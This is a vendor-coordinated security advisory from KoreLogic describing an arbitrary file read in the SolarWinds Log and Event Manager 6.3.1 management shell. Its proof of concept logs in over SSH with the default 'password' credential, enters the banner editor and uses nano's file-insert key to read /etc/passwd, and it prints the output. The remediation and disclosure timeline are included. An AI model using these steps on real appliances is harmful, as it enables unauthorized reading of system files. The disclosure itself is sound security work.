Solarwinds LEM 6.3.1 Management Shell Arbitrary File Read

The management shell on Solarwinds Log and Event Manager Virtual Appliance version 6.3.1 allows the end user to edit the MOTD banner displayed during SSH logon. The editor provided for this is nano. This editor has a keyboard mapped function which lets the user import a file from the local file system into the editor. An attacker can abuse this to read arbitrary files within the allowed permissions.


MD5 | f78a6aa709d515f34ff4063017a41667

KL-001-2017-008 : Solarwinds LEM Management Shell Arbitrary File Read

Title: Solarwinds LEM Management Shell Arbitrary File Read
Advisory ID: KL-001-2017-008
Publication Date: 2017.04.24
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-008.txt


1. Vulnerability Details

Affected Vendor: Solarwinds
Affected Product: Log and Event Manager Virtual Appliance
Affected Version: v6.3.1
Platform: Embedded Linux
CWE Classification: CWE-36: Absolute Path Traversal
Impact: Information Disclosure
Attack vector: SSH

2. Vulnerability Description

The management shell allows the end user to edit the MOTD banner
displayed during SSH logon. The editor provided for this is
nano. This editor has a keyboard mapped function which lets
the user import a file from the local file system into the
editor. An attacker can abuse this to read arbitrary files
within the allowed permissions.

3. Technical Description

Should an attacker gain access to the SSH console for the
cmc user, read access to files on the local filesystem can be
achieved. The default password for the cmc user is "password".

This is accomplished by abusing the editor selection for the
MOTD banner edit functionality.

$ ssh [email protected]
Password:
Linux swi-lem 3.2.0-3-amd64 #1 SMP Mon Jul 23 02:45:17 UTC 2012 x86_64
Last login: Sun Dec 11 11:35:29 2016 from 1.3.3.6
//////////////////////////////////////////////////
/// SolarWinds Log & Event Manager ///
/// management console ///
//////////////////////////////////////////////////

Detected VMware Virtual Platform
Product Support Key: RPFYJ-2L3RW-RV5T-GA3K-VLULC-XAPTH
Available commands:
[ appliance ] Network, System
[ manager ] Upgrade, Debug
[ service ] Restrictions, SSH, Snort
[ ndepth ] nDepth Configuration/Maintenance
upgrade Upgrade this Appliance
admin Run Admin UI (for better usability browse https://1.3.3.7/mvc/configuration)
import Import a file that can be used from the Admin UI
help display this help
exit Exit
cmc > appliance
Available commands:
activate Activate appliance features after licensing.
checklogs Check Appliance Logs for Remote Data
clearsyslog Clear Syslog Logs
cleantemp * Clean Up Temporary Files
multimanagerconfig * Enable/disable multimanager
dateconfig Update Date and Time
dbdiskconfig * Configure database retention
diskusage Check Disk Usage of your Manager
diskusageconfig Set Disk Usage Limit of your Manager
editbanner Edit the SSH login banner.
exportsyslog Export System Logs
hostname Change the Manager Appliance hostname
import Import SIM/LEM Backup to LEM
limitsyslog Configure the syslog rotation limit (default: 50)
setlogrotate Configure the syslog rotation frequency (hourly or daily)
netconfig Configure Network Parameters (IP Address, Netmask, DNS)
ntpconfig Update NTP Server Preferences
password Change the CMC User Password
ping Ping an IP address or hostname
reboot Reboot the Manager Appliance
resetsystemmac Reset the MAC address of the Appliance
shutdown Shut Down the Manager Appliance
top View Manager Appliance CPU/Memory Utilization
tzconfig Update Time Zone information
viewnetconfig View Network Parameters (IP address, netmask, DNS)
exit Return to main menu

NOTE: Commands with an asterisk (*) include an automatic manager service restart
cmc::appliance > editbanner
Press <enter> to configure the SSH banner.

Once inside nano, ^R to get the screen below:

File to insert [from ./] : /etc/passwd
^G Get Help
^C Cancel

The result will be:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
Debian-exim:x:102:102::/var/spool/exim4:/bin/false
trigeo:x:1000:1000:trigeo,,,:/usr/local/contego/:/bin/bash
sshd:x:100:65534::/var/run/sshd:/usr/sbin/nologin
postgres:x:101:104:PostgreSQL administrator,,,:/var/lib/postgres:/bin/bash
cmc:x:1001:1000:CMC,,,:/usr/local/contego/:/usr/local/contego/scripts/mgrconfig.pl
libuuid:x:105:107::/var/lib/libuuid:/bin/sh
snort:x:103:105:Snort IDS:/var/log/snort:/bin/false
messagebus:x:106:109::/var/run/dbus:/bin/false
snmp:x:104:108::/var/lib/snmp:/bin/false
lynx:x:1002:1003::/home/lynx:/bin/sh

4. Mitigation and Remediation Recommendation

The vendor has released a Hotfix to remediate this
vulnerability. Hotfix and installation instructions are
available at:

https://thwack.solarwinds.com/thread/111223

5. Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel)
and Hank Leininger of KoreLogic, Inc.

6. Disclosure Timeline

2017.02.16 - KoreLogic sends vulnerability report and PoC to
Solarwinds <[email protected]> using PGP key
with fingerprint
A86E 0CF6 9665 0C8C 8A7C C9BA B373 8E9F 951F 918F.
2017.02.20 - Solarwinds replies that the key is no longer in
use, requests alternate communication channel.
2017.02.22 - KoreLogic submits vulnerability report and PoC to
alternate Solarwinds contact.
2017.02.23 - Solarwinds confirms receipt of vulnerability
report.
2017.04.06 - 30 business days have elapsed since Solarwinds
acknowledged receipt of vulnerability details.
2017.04.11 - Solarwinds releases hotfix and public disclosure.
2017.04.24 - KoreLogic public disclosure.

7. Proof of Concept

See 3. Technical Description


The contents of this advisory are copyright(c) 2017
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt


Related Posts